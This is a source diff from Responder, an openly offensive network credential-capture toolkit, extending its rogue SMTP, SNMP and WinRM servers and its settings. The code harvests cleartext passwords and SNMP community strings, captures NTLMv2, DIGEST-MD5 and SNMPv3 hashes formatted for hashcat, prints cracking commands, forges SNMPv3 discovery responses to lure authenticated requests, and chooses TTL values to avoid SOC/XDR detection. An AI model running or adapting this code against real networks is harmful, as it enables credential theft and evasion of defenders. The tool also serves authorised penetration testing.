nonce_match = re.search(r'nonce="([^"]+)"', response)
cnonce_match = re.search(r'cnonce="([^"]+)"', response)
nc_match = re.search(r'nc=([0-9a-fA-F]+)', response)
qop_match = re.search(r'qop=([a-z\-]+)', response)
uri_match = re.search(r'digest-uri="([^"]+)"', response)
response_match = re.search(r'response=([0-9a-fA-F]+)', response)
if not username_match or not response_match:
return False
username = username_match.group(1)
realm = realm_match.group(1) if realm_match else ''
resp_nonce = nonce_match.group(1) if nonce_match else ''
cnonce = cnonce_match.group(1) if cnonce_match else ''
nc = nc_match.group(1) if nc_match else ''
qop = qop_match.group(1) if qop_match else ''
uri = uri_match.group(1) if uri_match else ''
resp_hash = response_match.group(1)
# Format for hashcat/john
hash_string = "%s:$sasl$DIGEST-MD5$%s$%s$%s$%s$%s$%s$%s" % (
username, realm, nonce, cnonce, nc, qop, uri, resp_hash
)
SaveToDb({
'module': 'SMTP',
'type': 'DIGEST-MD5',
'client': self.client_address[0],
'user': username,
'hash': resp_hash,
'fullhash': hash_string,
})
if settings.Config.Verbose:
print(color("[*] [SMTP] Captured DIGEST-MD5 hash from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 3, 1))
# Send rspauth (expected by some clients)
rspauth = 'rspauth=' + resp_hash
self.send_continue(b64encode(rspauth.encode('latin-1')).decode('latin-1'))
# Client should send empty line
self.request.recv(1024)
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Error parsing DIGEST-MD5: %s' % str(e)))
return False
def handle_auth_ntlm(self, data):
"""Handle AUTH NTLM with proper Type 2 challenge"""
try:
import time
# Check for inline NTLM NEGOTIATE
auth_match = re.search(b'AUTH NTLM (.+)', data, re.IGNORECASE)
if auth_match:
negotiate_b64 = auth_match.group(1).strip()
else:
# Send empty continuation
self.send_continue()
negotiate_b64 = self.request.recv(1024).strip()
if not negotiate_b64 or negotiate_b64 == b'*':
return False
negotiate = b64decode(negotiate_b64)
# Verify NTLMSSP signature
if negotiate[0:8] != b'NTLMSSP\x00':
return False
msg_type = struct.unpack('<I', negotiate[8:12])[0]
if msg_type != 1: # Type 1 - NEGOTIATE
return False
# Generate Type 2 with proper structure
type2_msg = self.generate_ntlm_type2()
challenge_b64 = b64encode(type2_msg).decode('latin-1')
# Send challenge
self.send_continue(challenge_b64)
# Receive NTLMSSP AUTH (Type 3)
auth_b64 = self.request.recv(2048).strip()
if not auth_b64 or auth_b64 == b'*':
return False
auth_data = b64decode(auth_b64)
# Parse Type 3 and extract hash
ntlm_hash = self.parse_ntlm_type3(auth_data, type2_msg)
if ntlm_hash:
# Extract username from hash for logging
username = ntlm_hash.split('::')[0]
SaveToDb({
'module': 'SMTP',
'type': 'NTLMv2-SSP',
'client': self.client_address[0],
'user': username,
'hash': ntlm_hash,
'fullhash': ntlm_hash,
})
if settings.Config.Verbose:
print(color("[*] [SMTP] Captured NTLMv2 hash from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 3, 1))
return True
return False
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Error parsing NTLM: %s' % str(e)))
return False
def generate_ntlm_type2(self):
"""Generate NTLM Type 2 with target info for NTLMv2"""
import time
# Generate random 8-byte challenge
challenge = RandomChallenge()
# Target name: "WORKGROUP" (18 bytes in UTF-16LE)
target_name = b'WORKGROUP'.decode('ascii').encode('utf-16le')
target_name_len = len(target_name)
# Build target info (AV pairs) for NTLMv2
target_info = b''
# MsvAvNbDomainName (0x0002)
av_domain = b'WORKGROUP'.decode('ascii').encode('utf-16le')
target_info += struct.pack('<HH', 0x0002, len(av_domain)) + av_domain
# MsvAvNbComputerName (0x0001)
av_computer = b'SERVER'.decode('ascii').encode('utf-16le')
target_info += struct.pack('<HH', 0x0001, len(av_computer)) + av_computer
# MsvAvDnsDomainName (0x0004)
av_dns_domain = b'workgroup'.decode('ascii').encode('utf-16le')
target_info += struct.pack('<HH', 0x0004, len(av_dns_domain)) + av_dns_domain
# MsvAvDnsComputerName (0x0003)
av_dns_computer = b'server'.decode('ascii').encode('utf-16le')
target_info += struct.pack('<HH', 0x0003, len(av_dns_computer)) + av_dns_computer
# MsvAvTimestamp (0x0007) - 8 bytes FILETIME
filetime = int((time.time() + 11644473600) * 10000000)
target_info += struct.pack('<HH', 0x0007, 8) + struct.pack('<Q', filetime)
# MsvAvEOL (0x0000)
target_info += struct.pack('<HH', 0x0000, 0)
target_info_len = len(target_info)
# Calculate offsets
target_name_offset = 48
target_info_offset = target_name_offset + target_name_len
# Build Type 2 message
type2_msg = b'NTLMSSP\x00' # Signature
type2_msg += struct.pack('<I', 2) # Type 2
# Target name (LE format: len, max len, offset)
type2_msg += struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
# Flags - use HTTP server flags for compatibility
type2_msg += b'\x05\x02\x81\xa2' # 0xa2810205
# Challenge (8 bytes)
type2_msg += challenge
# Context (8 bytes, reserved)
type2_msg += b'\x00' * 8
# Target info (LE format: len, max len, offset)
type2_msg += struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
# Payload
type2_msg += target_name
type2_msg += target_info
return type2_msg
def parse_ntlm_type3(self, type3_msg, type2_msg):
"""Parse Type 3 and extract NetNTLMv2 hash"""
try:
# Verify signature
if type3_msg[:8] != b'NTLMSSP\x00':
return None
# Verify message type
msg_type = struct.unpack('<I', type3_msg[8:12])[0]
if msg_type != 3:
return None
# Parse security buffers
# LM Response
lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
# NTLM Response
ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
# Domain name
domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
# User name
user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
# Workstation name
ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
# Extract strings
if user_offset + user_len <= len(type3_msg):
user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
else:
user = ""
if domain_offset + domain_len <= len(type3_msg):
domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
else:
domain = ""
# DO NOT parse email addresses - use exact Type 3 fields for hashcat
if ws_offset + ws_len <= len(type3_msg):
workstation = type3_msg[ws_offset:ws_offset+ws_len].decode('utf-16le', errors='ignore')
else:
workstation = ""
# Extract NTLM response
if ntlm_offset + ntlm_len <= len(type3_msg):
ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
else:
return None
# Check if NTLMv2 (response length > 24 bytes)
if len(ntlm_response) > 24:
# NTLMv2
ntlmv2_response = ntlm_response[:16] # First 16 bytes
ntlmv2_blob = ntlm_response[16:] # Rest is the blob
# Extract challenge from Type 2
challenge = type2_msg[24:32] # Challenge is at offset 24
# Build hashcat NetNTLMv2 format
# Format: username::domain:challenge:ntlmv2_response:blob
# For hashcat mode 5600
hash_str = "%s::%s:%s:%s:%s" % (
user,
domain,
codecs.encode(challenge, 'hex').decode('latin-1'),
codecs.encode(ntlmv2_response, 'hex').decode('latin-1'),
codecs.encode(ntlmv2_blob, 'hex').decode('latin-1')
)
return hash_str
# NTLMv1 or unsupported
return None
except Exception as e:
return None
def handle(self):
try:
# Send greeting
self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == b'EHLO' or data[0:4] == b'ehlo':
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH()))
# Handle EHLO
if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
# Send ESMTP capabilities
capabilities = [
settings.Config.MachineName + " Hello",
"STARTTLS",
"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
"SIZE 35651584",
"8BITMIME",
"PIPELINING",
"ENHANCEDSTATUSCODES"
]
self.send_multiline_response(250, capabilities)
data = self.request.recv(1024)
if data[0:4] == b'AUTH':
AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data)
if AuthPlain:
User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00')))
Username = User[0].decode('latin-1')
Password = User[1].decode('latin-1')
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
else:
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1()))
data = self.request.recv(1024)
# Handle STARTTLS command
if data[0:8].upper() == b'STARTTLS':
self.send_response(220, "Ready to start TLS")
if data:
try:
User = list(filter(None, b64decode(data).split(b'\x00')))
Username = User[0].decode('latin-1')
Password = User[1].decode('latin-1')
except:
Username = b64decode(data).decode('latin-1')
self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
# Upgrade to TLS
if self.upgrade_to_tls():
# After successful TLS upgrade, client will send EHLO again
data = self.request.recv(1024)
# Handle EHLO after STARTTLS
if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
# Send capabilities again (without STARTTLS this time)
capabilities = [
settings.Config.MachineName + " Hello",
"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
"SIZE 35651584",
"8BITMIME",
"PIPELINING",
"ENHANCEDSTATUSCODES"
]
self.send_multiline_response(250, capabilities)
data = self.request.recv(1024)
else:
# TLS upgrade failed
self.send_response(454, "TLS not available")
return
# Handle AUTH command
if data[0:4].upper() == b'AUTH':
mechanism = data[5:].strip().split(b' ')[0].upper()
if mechanism == b'PLAIN':
if self.handle_auth_plain(data):
self.send_response(235, "Authentication successful")
else:
self.send_response(535, "Authentication failed")
return
elif mechanism == b'LOGIN':
if self.handle_auth_login(data):
self.send_response(235, "Authentication successful")
else:
self.send_response(535, "Authentication failed")
return
elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
if self.handle_auth_cram_md5(data):
self.send_response(235, "Authentication successful")
else:
self.send_response(535, "Authentication failed")
return
elif mechanism == b'DIGEST-MD5' or mechanism.startswith(b'DIGEST'):
if self.handle_auth_digest_md5(data):
self.send_response(235, "Authentication successful")
else:
self.send_response(535, "Authentication failed")
return
elif mechanism == b'NTLM':
if self.handle_auth_ntlm(data):
self.send_response(235, "Authentication successful")
else:
self.send_response(535, "Authentication failed")
return
else:
self.send_response(504, "Unrecognized authentication type")
return
# Handle other commands
self.send_response(250, "OK")
except Exception as e:
if settings.Config.Verbose:
print(text('[SMTP] Exception: %s' % str(e)))
pass

381
servers/SNMP.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -15,36 +15,377 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
from binascii import hexlify, unhexlify
import struct
try:
from pyasn1.codec.ber.decoder import decode
from pyasn1.codec.ber.encoder import encode
HAS_PYASN1 = True
except ImportError:
HAS_PYASN1 = False
if settings.Config.Verbose:
print(text('[SNMP] Warning: pyasn1 not installed, SNMP server disabled'))
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from pyasn1.codec.der.decoder import decode
# SNMPv3 Authentication Algorithms
SNMPV3_AUTH_ALGORITHMS = {
b'\x06\x0c\x2b\x06\x01\x06\x03\x0f\x01\x01\x04\x00': ('usmNoAuthProtocol', None),
b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x02': ('usmHMACMD5AuthProtocol', 25100),
b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x03': ('usmHMACSHAAuthProtocol', 25200),
b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x04': ('usmHMAC128SHA224AuthProtocol', 25300),
b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x05': ('usmHMAC192SHA256AuthProtocol', 25400),
b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x06': ('usmHMAC256SHA384AuthProtocol', 25500),
b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x07': ('usmHMAC384SHA512AuthProtocol', 25600),
}
class SNMP(BaseRequestHandler):
def handle(self):
data = self.request[0]
received_record, rest_of_substrate = decode(data)
snmp_version = int(received_record['field-0'])
if snmp_version > 1:
# TODO: Add support for SNMPv3 (which will have a field-0 value of 2)
print(text("[SNMP] Unsupported SNMPv3 request received from %s" % self.client_address[0].replace("::ffff:","")))
if not HAS_PYASN1:
return
community_string = str(received_record['field-1'])
SaveToDb(
{
try:
data = self.request[0]
socket = self.request[1]
# Decode the SNMP message
try:
received_record, rest_of_substrate = decode(data)
except Exception as e:
if settings.Config.Verbose:
print(text('[SNMP] ASN.1 decode error: %s' % str(e)))
return
# Get SNMP version
try:
snmp_version = int(received_record['field-0'])
except:
if settings.Config.Verbose:
print(text('[SNMP] Could not determine SNMP version'))
return
# Handle SNMPv3
if snmp_version == 3:
self.handle_snmpv3(data, received_record, socket)
# Handle SNMPv1/v2c
else:
self.handle_snmpv1v2c(data, received_record, snmp_version, socket)
except Exception as e:
if settings.Config.Verbose:
print(text('[SNMP] Exception in handler: %s' % str(e)))
pass
def handle_snmpv3(self, data, received_record, socket):
"""Handle SNMPv3 messages and extract authentication parameters"""
try:
# Decode the inner security parameters
received_record_inner, _ = decode(received_record['field-2'])
# Extract fields
snmp_user = str(received_record_inner['field-3'])
engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8')
engine_boots = int(received_record_inner['field-1'])
engine_time = int(received_record_inner['field-2'])
auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8')
priv_params = hexlify(received_record_inner['field-5']._value).decode('utf-8')
# Zero out authentication parameters in packet for hashcat
# Hashcat recalculates HMAC over packet with auth params = zeros
data_hex = hexlify(data).decode('utf-8')
if auth_params and auth_params != '00' * 12:
# Replace auth params with zeros in the packet
zeroed_auth = '00' * (len(auth_params) // 2)
full_snmp_msg = data_hex.replace(auth_params, zeroed_auth)
else:
full_snmp_msg = data_hex
# Determine authentication algorithm
auth_algo_name, hashcat_mode = self.identify_auth_algorithm(data)
# If not detected by OID, infer from auth params length
if not hashcat_mode and auth_params and auth_params != '00' * 12:
auth_len = len(auth_params) // 2 # Convert hex to bytes
if auth_len == 12:
# Could be MD5 or SHA1 - use combined mode
auth_algo_name = 'HMAC-MD5-96/HMAC-SHA1-96'
hashcat_mode = 25000
elif auth_len == 16:
auth_algo_name = 'HMAC-SHA224'
hashcat_mode = 25300
elif auth_len == 24:
auth_algo_name = 'HMAC-SHA256'
hashcat_mode = 25400
elif auth_len == 32:
auth_algo_name = 'HMAC-SHA384'
hashcat_mode = 25500
elif auth_len == 48:
auth_algo_name = 'HMAC-SHA512'
hashcat_mode = 25600
# Check if this is a discovery request (no auth params and empty username)
if (not auth_params or auth_params == '00' * 12) and (not snmp_user or snmp_user == ''):
# Send discovery response with our engine ID
self.send_discovery_response(socket, received_record)
return
# Check if authentication is actually being used
if not auth_params or auth_params == '00' * 12:
# Still save the username with noAuth indicator
SaveToDb({
"module": "SNMP",
"type": "SNMPv3-noAuth",
"client": self.client_address[0],
"user": snmp_user,
"cleartext": "(noAuth)",
"fullhash": snmp_user + ":(noAuth)"
})
return
# Build hashcat-compatible hash
if hashcat_mode:
# Format for mode 25000: $SNMPv3$<type>$<boots>$<packet>$<engine_id>$<auth_params>
# type: 0=MD5/SHA1, 1=SHA1, 2=SHA224, etc.
# boots: engine boots in decimal
# packet: full SNMP packet in hex
# engine_id: engine ID in hex
# auth_params: authentication parameters in hex
auth_type_map = {
25000: 0, # MD5/SHA1 combined
25100: 0, # MD5
25200: 1, # SHA1
25300: 2, # SHA224
25400: 3, # SHA256
25500: 4, # SHA384
25600: 5, # SHA512
}
auth_type = auth_type_map.get(hashcat_mode, 0)
# Build the hash in correct format
hashcat_hash = "$SNMPv3$%d$%d$%s$%s$%s" % (
auth_type,
engine_boots,
full_snmp_msg,
engine_id,
auth_params
)
if settings.Config.Verbose:
print(text('[SNMP] SNMPv3 hash captured!'))
print(text('[SNMP] Crack with: hashcat -m %d hash.txt wordlist.txt' % hashcat_mode))
if hashcat_mode == 25000:
print(text('[SNMP] Note: Mode 25000 tries both MD5 and SHA1'))
print(text('[SNMP] Or use -m 25100 (MD5 only) or -m 25200 (SHA1 only)'))
# Sanitize type name for filesystem (remove slashes)
safe_type = auth_algo_name.replace('/', '-')
SaveToDb({
"module": "SNMP",
"type": "SNMPv3-%s" % safe_type,
"client": self.client_address[0],
"user": snmp_user,
"hash": hashcat_hash,
"fullhash": hashcat_hash
})
else:
# Unknown algorithm or no auth - save basic info
SaveToDb({
"module": "SNMP",
"type": "SNMPv3",
"client": self.client_address[0],
"user": snmp_user,
"hash": auth_params,
"fullhash": "{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params)
})
# Send a response (Report PDU indicating authentication failure)
# This keeps the conversation going
self.send_snmpv3_report(socket)
except Exception as e:
if settings.Config.Verbose:
print(text('[SNMP] SNMPv3 parsing error: %s' % str(e)))
pass
def handle_snmpv1v2c(self, data, received_record, snmp_version, socket):
"""Handle SNMPv1/v2c messages and extract community strings"""
try:
community_string = str(received_record['field-1'])
version_str = 'v1' if snmp_version == 0 else 'v2c'
if settings.Config.Verbose:
print(text('[SNMP] %s Community String: %s' % (version_str, community_string)))
# Validate community string (should be printable)
if not community_string or not self.is_printable(community_string):
return
SaveToDb({
"module": "SNMP",
"type": "Cleartext",
"type": "Cleartext SNMP%s" % version_str,
"client": self.client_address[0],
"user": community_string,
"cleartext": community_string,
"fullhash": community_string,
}
)
})
# Send a response (could be a proper SNMP response or error)
# For now, we just close the connection
except Exception as e:
if settings.Config.Verbose:
print(text('[SNMP] SNMPv1/v2c parsing error: %s' % str(e)))
pass
def identify_auth_algorithm(self, data):
"""
Identify the authentication algorithm used in SNMPv3
Returns (algorithm_name, hashcat_mode)
"""
try:
# Look for OID patterns in the raw data
for oid_bytes, (algo_name, hashcat_mode) in SNMPV3_AUTH_ALGORITHMS.items():
if oid_bytes in data:
return (algo_name, hashcat_mode)
# If not found by OID, try to infer from auth params length
# MD5: 12 bytes, SHA1: 12 bytes, SHA224: 16 bytes, SHA256: 24 bytes, SHA384: 32 bytes, SHA512: 48 bytes
# Note: This is less reliable
return (None, None)
except:
return (None, None)
def is_printable(self, s):
"""Check if string contains only printable characters"""
try:
return all(32 <= ord(c) <= 126 for c in s)
except:
return False
def send_snmpv3_report(self, socket):
"""
Send a minimal SNMPv3 Report PDU
This indicates authentication failure but keeps the conversation alive
"""
try:
# Minimal Report PDU - just close for now
# A proper implementation would build a valid SNMP Report PDU
pass
except:
pass
def send_discovery_response(self, socket, received_record):
"""
Send SNMPv3 discovery response with engine ID
This allows the client to send authenticated request
"""
try:
from pyasn1.type import univ
from pyasn1.codec.ber.encoder import encode
import os
import time
# Generate a random engine ID (or use a fixed one)
# Format: 0x80 + enterprise ID (4 bytes) + format + data
# Enterprise ID: 0x00000000 (reserved)
# Format: 0x05 (octets - allows arbitrary data)
# Data: 12 random bytes (17 bytes total to match hashcat requirements)
engine_id = b'\x80\x00\x00\x00\x05' + os.urandom(12)
# Engine boots and time
engine_boots = 1
engine_time = int(time.time()) % 2147483647
# Build the SNMPv3 message with Report-PDU
# Structure: SEQUENCE { version, globalData, securityParameters, scopedPDU }
# Global data
msg_id = int(received_record['field-1']['field-0'])
global_data = univ.Sequence()
global_data.setComponentByPosition(0, univ.Integer(msg_id))
global_data.setComponentByPosition(1, univ.Integer(65507)) # max size
global_data.setComponentByPosition(2, univ.OctetString(hexValue='04')) # flags: reportable
global_data.setComponentByPosition(3, univ.Integer(3)) # USM
# Security parameters (USM)
usm_params = univ.Sequence()
usm_params.setComponentByPosition(0, univ.OctetString(hexValue=engine_id.hex())) # engine ID
usm_params.setComponentByPosition(1, univ.Integer(engine_boots))
usm_params.setComponentByPosition(2, univ.Integer(engine_time))
usm_params.setComponentByPosition(3, univ.OctetString('')) # username
usm_params.setComponentByPosition(4, univ.OctetString(hexValue='00' * 12)) # auth params
usm_params.setComponentByPosition(5, univ.OctetString('')) # priv params
# Encode USM params
usm_encoded = encode(usm_params)
from pyasn1.type import tag
# Build Report-PDU with IMPLICIT tagging [8]
# The [8] tag REPLACES the SEQUENCE tag, not wraps it
# VarBind: OID + value
varbind_inner = univ.Sequence()
varbind_inner.setComponentByPosition(0, univ.ObjectIdentifier('1.3.6.1.6.3.15.1.1.4.0'))
varbind_inner.setComponentByPosition(1, univ.Integer(1))
varbind_encoded = encode(varbind_inner)
# VarBindList (SEQUENCE OF)
varbind_list_content = varbind_encoded
varbind_list_bytes = bytes([0x30, len(varbind_list_content)]) + varbind_list_content
# Report-PDU content (without SEQUENCE tag, will use [8] instead)
report_content = b''
# request-id
report_content += encode(univ.Integer(msg_id))
# error-status
report_content += encode(univ.Integer(0))
# error-index
report_content += encode(univ.Integer(0))
# variable-bindings
report_content += varbind_list_bytes
# Tag as [8] IMPLICIT (replaces SEQUENCE tag)
report_pdu_bytes = bytes([0xa8, len(report_content)]) + report_content
# Build scopedPDU as plain SEQUENCE (no [0] tag for plaintext)
# RFC 3412: plaintext msgData is just the ScopedPDU SEQUENCE
scoped_content = b''
# contextEngineID (OCTET STRING)
engine_bytes = bytes.fromhex(engine_id.hex())
scoped_content += bytes([0x04, len(engine_bytes)]) + engine_bytes
# contextName (OCTET STRING, empty)
scoped_content += bytes([0x04, 0x00])
# data (Report-PDU with implicit tag [8])
scoped_content += report_pdu_bytes
# msgData is just a SEQUENCE containing scopedPDU (no [0] tag)
msg_data_bytes = bytes([0x30, len(scoped_content)]) + scoped_content
# Use Any to include raw bytes
msg_data = univ.Any(hexValue=msg_data_bytes.hex())
# Full SNMPv3 message
snmp_msg = univ.Sequence()
snmp_msg.setComponentByPosition(0, univ.Integer(3)) # version snmpv3
snmp_msg.setComponentByPosition(1, global_data)
snmp_msg.setComponentByPosition(2, univ.OctetString(usm_encoded))
snmp_msg.setComponentByPosition(3, msg_data) # msgData with plaintext tag
# Encode and send
response = encode(snmp_msg)
socket.sendto(response, self.client_address)
if settings.Config.Verbose:
print(text('[SNMP] Sent discovery response with engine ID: %s' % engine_id.hex()))
except Exception as e:
if settings.Config.Verbose:
print(text('[SNMP] Error sending discovery response: %s' % str(e)))

10
servers/WinRM.py
View File

@@ -125,12 +125,16 @@ def PacketSequence(data, client, Challenge):
return Buffer
else:
if settings.Config.Basic:
Response = IIS_Basic_401_Ans()
r = IIS_Basic_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
else:
Response = IIS_Auth_401_Ans()
r = IIS_Auth_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
@@ -175,6 +179,6 @@ class WinRM(BaseRequestHandler):
self.request.send(NetworkSendBufferPython2or3(Buffer))
except:
raise
self.request.close()
pass

153
settings.py Executable file → Normal file
View File

@@ -23,7 +23,7 @@ import subprocess
from utils import *
__version__ = 'Responder 3.1.3.0'
__version__ = 'Responder 3.2.2.0'
class Settings:
@@ -42,25 +42,56 @@ class Settings:
return str.upper() == 'ON'
def ExpandIPRanges(self):
def expand_ranges(lst):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses
while l.count(':') < 7:
pos = l.find('::')
l = l[:pos] + ':' + l[pos:]
tab = l.split(':')
x = {}
i = 0
xaddr = ''
for byte in tab:
if byte == '':
byte = '0'
if '-' not in byte:
x[i] = x[i+1] = int(byte, base=16)
else:
b = byte.split('-')
x[i] = int(b[0], base=16)
x[i+1] = int(b[1], base=16)
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
for e in range(x[8], x[9]+1):
for f in range(x[10], x[11]+1):
for g in range(x[12], x[13]+1):
for h in range(x[14], x[15]+1):
xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h))
xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address
xaddr = re.sub(':{3,7}', '::', xaddr, count = 7)
ret.append(xaddr)
else:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
@@ -83,17 +114,26 @@ class Settings:
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
# Servers
# Poisoners
self.LLMNR_On_Off = self.toBool(config.get('Responder Core', 'LLMNR'))
self.NBTNS_On_Off = self.toBool(config.get('Responder Core', 'NBTNS'))
self.MDNS_On_Off = self.toBool(config.get('Responder Core', 'MDNS'))
self.DHCPv6_On_Off = self.toBool(config.get('Responder Core', 'DHCPv6'))
# Servers
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
self.QUIC_On_Off = self.toBool(config.get('Responder Core', 'QUIC'))
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
self.MYSQL_On_Off = self.toBool(config.get('Responder Core', 'MYSQL'))
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP'))
self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP'))
self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP'))
self.MQTT_On_Off = self.toBool(config.get('Responder Core', 'MQTT'))
self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS'))
self.RDP_On_Off = self.toBool(config.get('Responder Core', 'RDP'))
self.DCERPC_On_Off = self.toBool(config.get('Responder Core', 'DCERPC'))
@@ -121,6 +161,7 @@ class Settings:
self.NOESS_On_Off = options.NOESS_On_Off
self.WPAD_On_Off = options.WPAD_On_Off
self.DHCP_On_Off = options.DHCP_On_Off
self.DHCPv6_On_Off = options.DHCPv6_On_Off
self.Basic = options.Basic
self.Interface = options.Interface
self.OURIP = options.OURIP
@@ -135,7 +176,30 @@ class Settings:
self.DHCP_DNS = options.DHCP_DNS
self.ExternalIP6 = options.ExternalIP6
self.Quiet_Mode = options.Quiet
self.AnswerName = options.AnswerName
self.ErrorCode = options.ErrorCode
self.RDNSS_On_Off = options.RDNSS_On_Off
self.DNSSL_Domain = options.DNSSL_Domain
# TTL blacklist. Known to be detected by SOC / XDR
TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
# Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
if options.TTL is None:
self.TTL = None
# Random TTL
elif options.TTL.upper() == "RANDOM":
TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
if TTL in TTL_blacklist:
TTL = int.from_bytes(TTL, "big")+1
TTL = int.to_bytes(TTL, 4)
self.TTL = TTL.decode('utf-8')
else:
self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
#Do we have IPv6 for real?
self.IPv6 = utils.Probe_IPv6_socket()
if self.Interface == "ALL":
self.Bind_To_ALL = True
else:
@@ -169,6 +233,16 @@ class Settings:
else:
self.ExternalResponderIP6 = self.Bind_To6
# Kerberos operation mode: CAPTURE (AS-REP hashes) or FORCE_NTLM (force fallback)
try:
self.KerberosMode = config.get('Kerberos', 'KerberosMode').strip()
if self.KerberosMode not in ['CAPTURE', 'FORCE_NTLM']:
print('[Config] Invalid KerberosMode: %s, defaulting to CAPTURE' % self.KerberosMode)
self.KerberosMode = 'CAPTURE'
except:
# Default to CAPTURE mode if not specified (backward compatible)
self.KerberosMode = 'CAPTURE'
self.Os_version = sys.platform
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
@@ -176,6 +250,7 @@ class Settings:
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.MQTTLog = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt')
